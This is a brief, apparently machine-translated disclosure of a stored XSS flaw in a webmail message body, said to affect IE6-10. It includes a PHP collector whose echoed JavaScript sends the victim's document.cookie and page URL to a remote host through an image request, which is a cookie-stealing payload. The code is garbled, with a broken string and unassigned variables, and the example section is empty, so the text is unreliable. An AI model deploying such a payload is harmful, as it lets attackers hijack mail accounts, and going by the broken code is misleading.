US online mail body stored XSS, exploitable blind (first in various skills)
The US online mail body has a stored XSS that can be exploited blind! A variety of cool first! Affected versions: IE6-10
Xss code:
<div style="display:none"></div>
Email receiving code:
<?php
echo "new Image().src='http://127.0.0.1/aol.php?mail=aol&cookie='+escape(document.cookie)+'&url='+escape(top.document.location.href); "comment', $mail."\r\n".$cookie."\r\n".$url);
function get($get) { // get escape function
    $val = !empty($_GET[$get]) ? $_GET[$get] : null;
    return $val;
}
?>
Example:
Xss:
Solution:
Various Filters